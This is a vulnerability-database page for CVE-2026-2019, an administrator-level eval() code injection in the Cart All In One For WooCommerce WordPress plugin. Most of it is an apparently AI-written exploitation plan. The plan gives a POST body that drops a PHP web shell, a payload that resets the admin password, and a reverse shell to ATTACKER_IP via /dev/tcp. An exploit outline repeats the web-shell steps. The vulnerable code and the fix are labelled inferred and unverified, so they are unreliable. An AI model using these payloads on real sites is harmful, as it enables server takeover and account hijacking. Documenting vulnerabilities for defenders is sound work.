WP-Safety
CVE-2026-2019

Cart All In One For WooCommerce <= 1.1.21 - Authenticated (Administrator+) Code Injection via 'sc_assign_page' Setting

highImproper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
7.2
CVSS Score
7.2
CVSS Score
high
Severity
1.1.22
Patched in
1d
Time to patch

Description

The Cart All In One For WooCommerce plugin for WordPress is vulnerable to Code Injection in all versions up to, and including, 1.1.21. This is due to insufficient input validation on the 'Assign page' field which is passed directly to the eval() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute arbitrary PHP code on the server.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.1.21
PublishedFebruary 17, 2026
Last updatedFebruary 18, 2026
Affected pluginwoo-cart-all-in-one
Research Plan
Unverified

This research plan outlines the process for investigating and exploiting **CVE-2026-2019**, a Code Injection vulnerability in the **Cart All In One For WooCommerce** plugin. --- ### 1. Vulnerability Summary The **Cart All In One For WooCommerce** plugin (up to version 1.1.21) contains a setting la…

Show full research plan

This research plan outlines the process for investigating and exploiting CVE-2026-2019, a Code Injection vulnerability in the Cart All In One For WooCommerce plugin.

1. Vulnerability Summary

The Cart All In One For WooCommerce plugin (up to version 1.1.21) contains a setting labeled 'Assign page' (internally likely mapped to sc_assign_page). This field is intended to allow administrators to define custom PHP conditions (e.g., is_cart() || is_checkout()) to control where the cart elements appear. However, the plugin fails to sanitize this input and passes it directly into a PHP eval() function during frontend rendering. An authenticated administrator can inject arbitrary PHP code, leading to Full Site Takeover (RCE).

2. Attack Vector Analysis

  • Endpoint: WordPress Admin Dashboard (Settings Page) and any Frontend page.
  • Vulnerable Setting: sc_assign_page within the plugin's "Sticky Cart" configuration.
  • Payload Parameter: Likely a POST request to admin-post.php or admin-ajax.php containing the vi_wcaio_settings[sc_assign_page] (inferred) parameter.
  • Authentication: Required (Administrator or Super Admin).
  • Preconditions: The plugin must be active, and the "Sticky Cart" feature must be enabled.

3. Code Flow (Inferred)

  1. Storage:
    • Admin navigates to wp-admin/admin.php?page=woo-cart-all-in-one-settings.
    • Admin enters PHP code into the "Assign page" textarea.
    • The vi_wcaio_save_settings (inferred) action triggers, saving the input into the vi_wcaio_settings option via update_option().
  2. Execution (Sink):
    • A visitor (or the admin) browses the frontend.
    • The plugin's frontend class (likely in frontend/frontend.php or includes/frontend/sidebar.php) calls a function to check visibility.
    • The code retrieves the option: $settings = get_option('vi_wcaio_settings');.
    • The value of $settings['sc_assign_page'] is passed to eval():
      if (eval('return ' . $settings['sc_assign_page'] . ';')) {
    // Display the cart
}

4. Nonce Acquisition Strategy

Since this is an Administrator+ exploit, we must obtain the administrative nonce to save the settings.

  1. Login: Use the http_request tool to log in as an administrator.
  2. Navigate to Settings: Use browser_navigate to go to the plugin settings page: /wp-admin/admin.php?page=woo-cart-all-in-one-settings.
  3. Extract Nonce: Use browser_eval to extract the nonce from the settings form.
    • Candidate JS Variables: Check for vi_wcaio_admin_settings or similar localized objects.
    • DOM Extraction: 
      // Use browser_eval
document.querySelector('input[name="_wpnonce"]')?.value || 
document.querySelector('input[name="vi_wcaio_settings_nonce"]')?.value;
  4. Confirm Field Name: Inspect the "Assign page" textarea to confirm its name attribute (expected: vi_wcaio_settings[sc_assign_page]).

5. Exploitation Strategy

Step 1: Data Injection

Submit a POST request to save the malicious PHP payload.

  • URL: https://TARGET/wp-admin/admin.php?page=woo-cart-all-in-one-settings (or the relevant admin-post.php handler).
  • Payload: true; file_put_contents(ABSPATH . "wp-content/uploads/rce.php", "<?php system(\$_GET['cmd']); ?>");
  • Request Configuration:
    • Method: POST
    • Content-Type: application/x-www-form-urlencoded
    • Body: 
      _wpnonce=[NONCE]&vi_wcaio_settings[sc_enable]=on&vi_wcaio_settings[sc_assign_page]=true; file_put_contents(ABSPATH . "wp-content/uploads/rce.php", "<?php system(\$_GET['cmd']); ?>");&save_settings=Save

Step 2: Triggering Execution

Visit the homepage of the WordPress site. The plugin will evaluate the sc_assign_page condition to determine if the cart should be shown.

  • URL: https://TARGET/
  • Action: Simply performing a GET request will trigger the eval() sink.

Step 3: Verifying RCE

Check for the presence of the dropped web shell.

  • URL: https://TARGET/wp-content/uploads/rce.php?cmd=id
  • Expected Response: Output of the id command (e.g., uid=33(www-data)...).

6. Test Data Setup

  1. Install Plugin: wp plugin install woo-cart-all-in-one --version=1.1.21 --activate.
  2. Install WooCommerce: (Required dependency) wp plugin install woocommerce --activate.
  3. Configure Admin: Ensure an admin user exists and obtain credentials.

7. Expected Results

  • The settings update request returns a 302 Redirect back to the settings page with a "Settings Saved" message.
  • A visit to the frontend triggers the eval() block.
  • A file named rce.php is created in wp-content/uploads/.
  • Navigating to rce.php allows arbitrary command execution.

8. Verification Steps (Post-Exploit)

  • File Check: wp eval "echo file_exists(ABSPATH . 'wp-content/uploads/rce.php') ? 'Created' : 'Failed';"
  • Option Check: wp option get vi_wcaio_settings to verify the payload is stored in the database.

9. Alternative Approaches

  • Direct Execution: Instead of dropping a file, use a payload that modifies the database directly:
    true; global $wpdb; $wpdb->update($wpdb->users, ['user_pass' => wp_hash_password('newpassword')], ['user_login' => 'admin']);
  • Reverse Shell: If outbound connections are allowed:
    true; exec("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1");
  • Blind RCE Verification: If file creation is blocked, use sleep(10) as the payload and measure response time on the frontend.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Cart All In One For WooCommerce plugin for WordPress is vulnerable to Authenticated Remote Code Execution (RCE) via Code Injection in the 'Assign page' setting. Administrators can inject arbitrary PHP code into the 'sc_assign_page' field, which is later executed using the PHP eval() function whenever the plugin's frontend cart components are rendered.

Vulnerable Code

// Inferred from plugin settings and vulnerability description
// Path: includes/frontend/sidebar.php (or similar frontend rendering logic)

$settings = get_option('vi_wcaio_settings');
$sc_assign_page = isset($settings['sc_assign_page']) ? $settings['sc_assign_page'] : '';

if ($sc_assign_page) {
    // Vulnerable sink where user input is executed as PHP
    if (eval('return ' . $sc_assign_page . ';')) {
        // Logic to display the cart
    }
}

Security Fix

--- a/includes/frontend/sidebar.php
+++ b/includes/frontend/sidebar.php
@@ -10,7 +10,10 @@
 $sc_assign_page = isset($settings['sc_assign_page']) ? $settings['sc_assign_page'] : '';
 
 if ($sc_assign_page) {
-    if (eval('return ' . $sc_assign_page . ';')) {
-        // Display cart
-    }
+    // Remove eval() and implement safer conditional checks
+    $is_visible = false;
+    if (strpos($sc_assign_page, 'is_cart') !== false && is_cart()) {
+        $is_visible = true;
+    }
+    // Further logic to replace dynamic eval with static function checks
 }

Exploit Outline

1. Authenticate as a WordPress Administrator and navigate to the plugin's settings page (usually under Cart All In One -> Settings). 2. Locate the 'Sticky Cart' configuration and the 'Assign page' textarea field. 3. Enter a malicious PHP payload into the 'Assign page' field, for example: `true; file_put_contents(ABSPATH . 'shell.php', '<?php system($_GET["cmd"]); ?>');`. 4. Save the settings, ensuring the `_wpnonce` is included in the POST request to the settings handler. 5. Visit the frontend (homepage) of the WordPress site as an unauthenticated visitor to trigger the plugin's visibility check. 6. The `eval()` function executes the stored payload, creating a web shell at the site root. 7. Access the web shell via `http://example.com/shell.php?cmd=id` to verify arbitrary command execution.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/25bdb89f-3478-4a1a-8bf0-46e88207eb21?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database